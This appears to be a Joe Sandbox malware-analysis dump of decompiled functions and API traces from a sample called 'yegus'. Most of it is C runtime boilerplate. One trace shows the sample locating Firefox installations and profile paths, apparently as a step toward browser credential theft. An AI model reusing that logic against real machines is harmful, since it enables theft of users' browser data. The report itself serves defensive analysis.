    0x01336baa
    0x01336bb0
    0x01336bb2
    0x00000000
    0x01336bb2
    0x01336b7a
    0x01336b83
    0x01336b92
    0x01336b85
    0x01336b88
    0x01336b8e
    0x01336b8e
    0x01336b96
    0x00000000
    0x01336b98
    0x01336b9b
    0x01336b9d
    0x00000000
    0x01336b9d
    0x01336b96
    0x01336b58
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,01347C08,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx), ref: 01336B6E
    • GetLastError.KERNEL32(?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24), ref: 01336B7A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx), ref: 01336B88
    • FreeLibrary.KERNEL32(00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000), ref: 01336BAA
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10084366, Relevance: 6.1, APIs: 4, Instructions: 54library
    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree), ref: 1008439E
    • GetLastError.KERNEL32(?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005), ref: 100843AA
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000), ref: 100843B8
    • FreeLibrary.KERNEL32(00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076), ref: 100843DA
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A70A, Relevance: 6.1, APIs: 4, Instructions: 52library
    C-Code - Quality: 95%
    			E0133A70A(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1348280 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1341298 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x262637d4
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











    0x0133a70f
    0x0133a713
    0x0133a71a
    0x0133a71e
    0x0133a72c
    0x0133a73c
    0x0133a742
    0x0133a746
    0x0133a76f
    0x0133a771
    0x0133a775
    0x0133a778
    0x0133a778
    0x0133a77e
    0x0133a780
    0x00000000
    0x0133a781
    0x0133a748
    0x0133a751
    0x0133a760
    0x0133a753
    0x0133a756
    0x0133a75c
    0x0133a75c
    0x0133a764
    0x00000000
    0x0133a766
    0x0133a769
    0x0133a76b
    0x00000000
    0x0133a76b
    0x0133a764
    0x0133a720
    0x0133a725
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue), ref: 0133A73C
    • GetLastError.KERNEL32(?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA), ref: 0133A748
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000), ref: 0133A756
    • FreeLibrary.KERNEL32(00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364), ref: 0133A778
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10086DB8, Relevance: 6.1, APIs: 4, Instructions: 52library
    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,10084CC8,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue), ref: 10086DEA
    • GetLastError.KERNEL32(?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85), ref: 10086DF6
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000), ref: 10086E04
    • FreeLibrary.KERNEL32(00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364), ref: 10086E26
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1000CAF0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177
    APIs
    • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,100A2268,?,?,1000B488,?,?,00000000), ref: 1000CC4D
    Strings
    • winDelete, xrefs: 1000CCE4
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000CC27
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1000A4F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158file
    APIs
    • ReadFile.KERNEL32(?,?,?,?,?), ref: 1000A5B3
    Strings
    • winRead, xrefs: 1000A61E
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000A653
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10001C2D, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
    APIs
      • Part of subcall function 100823B0: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100823F6
      • Part of subcall function 100823B0: RegEnumKeyA.ADVAPI32(?,00000000,?,00001000), ref: 1008241E
      • Part of subcall function 100823B0: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,00000000,00001000,?,00000000,00001000,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 10082470
      • Part of subcall function 100823B0: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,00000000,?,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100824A5
      • Part of subcall function 100823B0: StrStrIA.SHLWAPI(?,firefox), ref: 100824CA
      • Part of subcall function 100823B0: RegQueryValueExA.KERNEL32(?,InstallLocation,00000000,00000000,?,?), ref: 100824FB
      • Part of subcall function 100823B0: RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000000,?,00001000), ref: 10082534
      • Part of subcall function 100823B0: RegEnumKeyA.ADVAPI32(?,00000001,?,00001000), ref: 10082556
      • Part of subcall function 100823B0: lstrlenA.KERNEL32(?), ref: 1008259F
      • Part of subcall function 10001AA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 10001B02
      • Part of subcall function 10001AA0: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10001B0F
      • Part of subcall function 10001AA0: lstrlenA.KERNEL32(\Mozilla\Firefox\,?,?,?,?,?,?,?,00000000), ref: 10001B22
      • Part of subcall function 10001AA0: GetPrivateProfileStringA.KERNEL32(Profile0,Path,10094D91,?,00000105,?), ref: 10001B7A
      • Part of subcall function 10001AA0: wsprintfA.USER32 ref: 10001BAF
    • HeapFree.KERNEL32(00000000,?), ref: 10001D40
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
      • Part of subcall function 10001670: lstrlenA.KERNEL32(?,00000000,00000000,10001CC5,00000000), ref: 10001677
      • Part of subcall function 10001670: SetCurrentDirectoryA.KERNELBASE(00000000), ref: 10001691
      • Part of subcall function 100821C0: wvnsprintfA.SHLWAPI(?,?,?,?), ref: 100821E8
      • Part of subcall function 100821C0: lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,10001B55,?,00000105,%s\profiles.ini,?,?,\Mozilla\Firefox\), ref: 100821F9
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 10001908
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 1000192F
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 10001956
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 100019B7
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 100019C4
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 100019EA
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 100019F8
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A03
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A11
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A1E
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A2E
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A40
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 10001A52
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A61
      • Part of subcall function 100018A0: UnmapViewOfFile.KERNEL32(?), ref: 10001A93
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A007, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    C-Code - Quality: 96%
    			E0133A007(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t89;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				void* _t95;
				char* _t96;
				intOrPtr _t98;
				signed int _t99;

				_t94 = __edx;
				_t63 =  *0x1347004; // 0x262637d3
				_v8 = _t63 ^ _t99;
				_t98 = _a4;
				if(GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
					_t95 = _t98 + 0x119;
					_t89 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t95;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t96 = _t95 + _t89;
						_t69 = _t68 + _t96;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t96 = 0;
							} else {
								_t72 = _t98 + _t89;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t89 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000010;
							_t54 = _t89 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t96 = _t73;
						}
						_t68 = _v1828;
						_t95 = _t98 + 0x119;
						_t89 = _t89 + 1;
						__eflags = _t89 - 0x100;
					} while (_t89 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t99 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t92 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t105 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t94 =  *(_t92 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t94;
							if(_t76 > _t94) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t99 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t92 = _t92 + 2;
						__eflags = _t92;
						_t75 =  *_t92;
					}
					E0133B083(_t94, _t105, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
					E0133D17C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0); // executed
					E0133D17C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
					_t93 = 0;
					do {
						_t86 =  *(_t99 + _t93 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t98 + _t93 + 0x119)) = 0;
							} else {
								_t37 = _t98 + _t93 + 0x19;
								 *_t37 =  *(_t98 + _t93 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x304));
								goto L15;
							}
						} else {
							 *(_t98 + _t93 + 0x19) =  *(_t98 + _t93 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x204));
							L15:
							 *((char*)(_t98 + _t93 + 0x119)) = _t87;
						}
						_t93 = _t93 + 1;
					} while (_t93 < 0x100);
				}
				return E01333E82(0, _v8 ^ _t99, 0x100, _t98);
			}


































    0x0133a007
    0x0133a012
    0x0133a019
    0x0133a01e
    0x0133a03b
    0x0133a133
    0x0133a139
    0x0133a13b
    0x0133a13c
    0x0133a13c
    0x0133a13e
    0x0133a144
    0x0133a144
    0x0133a146
    0x0133a148
    0x0133a151
    0x0133a154
    0x0133a160
    0x0133a167
    0x0133a177
    0x0133a169
    0x0133a169
    0x0133a16c
    0x0133a16c
    0x0133a16c
    0x0133a170
    0x0133a170
    0x00000000
    0x0133a170
    0x0133a156
    0x0133a156
    0x0133a15b
    0x0133a15b
    0x0133a173
    0x0133a173
    0x0133a173
    0x0133a179
    0x0133a17f
    0x0133a185
    0x0133a186
    0x0133a186
    0x0133a041
    0x0133a041
    0x0133a043
    0x0133a043
    0x0133a04a
    0x0133a04b
    0x0133a04f
    0x0133a055
    0x0133a05b
    0x0133a083
    0x0133a083
    0x0133a085
    0x00000000
    0x00000000
    0x0133a064
    0x0133a068
    0x0133a07a
    0x0133a07a
    0x0133a07c
    0x00000000
    0x00000000
    0x0133a06d
    0x0133a06f
    0x0133a071
    0x0133a079
    0x0133a079
    0x00000000
    0x0133a079
    0x00000000
    0x0133a06f
    0x0133a07e
    0x0133a07e
    0x0133a081
    0x0133a081
    0x0133a09d
    0x0133a0be
    0x0133a0e6
    0x0133a0ee
    0x0133a0f0
    0x0133a0f0
    0x0133a0fa
    0x0133a10a
    0x0133a10c
    0x0133a123
    0x0133a10e
    0x0133a10e
    0x0133a10e
    0x0133a10e
    0x0133a113
    0x00000000
    0x0133a113
    0x0133a0fc
    0x0133a0fc
    0x0133a101
    0x0133a11a
    0x0133a11a
    0x0133a11a
    0x0133a12a
    0x0133a12b
    0x0133a12f
    0x0133a19a

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 0133A02C
      • Part of subcall function 0133B083: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 0133B0D0
      • Part of subcall function 0133B083: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0133B159
      • Part of subcall function 0133B083: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0133B16B
      • Part of subcall function 0133B083: __freea.LIBCMT ref: 0133B174
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10088B6B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10088B90
      • Part of subcall function 1008AA2F: MultiByteToWideChar.KERNEL32(?,00000000,?,10087DA6,00000000,00000000,10086575,?,00000000,?,00000001,10087DA6,?,00000001,10086575,00000000), ref: 1008AA7C
      • Part of subcall function 1008AA2F: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1008AB05
      • Part of subcall function 1008AA2F: GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,10084ED3,?), ref: 1008AB17
      • Part of subcall function 1008AA2F: __freea.LIBCMT ref: 1008AB20
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A942, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
    C-Code - Quality: 34%
    			E0133A942(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t27 = __ecx;
				_t26 = __ebx;
				_push(__ecx);
				_t18 =  *0x1347004; // 0x262637d3
				_v8 = _t18 ^ _t35;
				_t20 = E0133A66E(0x16, "LCMapStringEx", 0x134177c, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					LCMapStringW(E0133A9CA(__ebx, _t27, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x1340140(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t33();
				}
				_pop(_t34);
				return E01333E82(_t26, _v8 ^ _t35, _t31, _t34);
			}










    0x0133a942
    0x0133a942
    0x0133a942
    0x0133a947
    0x0133a948
    0x0133a94f
    0x0133a964
    0x0133a969
    0x0133a970
    0x0133a9b3
    0x0133a972
    0x0133a98f
    0x0133a995
    0x0133a995
    0x0133a9be
    0x0133a9c7

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0133A9B3
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10087064, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000100,?,00000100,00000100,10001C26), ref: 100870D5
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A8E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
    C-Code - Quality: 17%
    			E0133A8E0(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				void* _t15;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t15 = __ebx;
				_push(__ecx);
				_t8 =  *0x1347004; // 0x262637d3
				_v8 = _t8 ^ _t24;
				_t22 = E0133A66E(0x14, "InitializeCriticalSectionEx", 0x1341774, 0x134177c);
				if(_t22 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
				} else {
					 *0x1340140(_a4, _a8, _a12);
					 *_t22();
				}
				_pop(_t23);
				return E01333E82(_t15, _v8 ^ _t24, _t20, _t23);
			}











    0x0133a8e0
    0x0133a8e0
    0x0133a8e5
    0x0133a8e6
    0x0133a8ed
    0x0133a907
    0x0133a90e
    0x0133a92b
    0x0133a910
    0x0133a91b
    0x0133a921
    0x0133a921
    0x0133a936
    0x0133a93f

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?,01338FC5), ref: 0133A92B
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    • InitializeCriticalSectionEx, xrefs: 0133A8FB
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10087002, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1008704D
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    • InitializeCriticalSectionEx, xrefs: 1008701D
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A785, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    C-Code - Quality: 16%
    			E0133A785(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				void* _t11;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t11 = __ebx;
				_push(__ecx);
				_t4 =  *0x1347004; // 0x262637d3
				_v8 = _t4 ^ _t20;
				_t6 = E0133A66E(3, "FlsAlloc", 0x1341738, 0x1341740); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					TlsAlloc();
				} else {
					 *0x1340140(_a4);
					 *_t18();
				}
				_pop(_t19);
				return E01333E82(_t11, _v8 ^ _t20, _t16, _t19);
			}












    0x0133a785
    0x0133a785
    0x0133a78a
    0x0133a78b
    0x0133a792
    0x0133a7a7
    0x0133a7ac
    0x0133a7b3
    0x0133a7c4
    0x0133a7b5
    0x0133a7ba
    0x0133a7c0
    0x0133a7c0
    0x0133a7cf
    0x0133a7d8

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • TlsAlloc.KERNEL32 ref: 0133A7C4
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
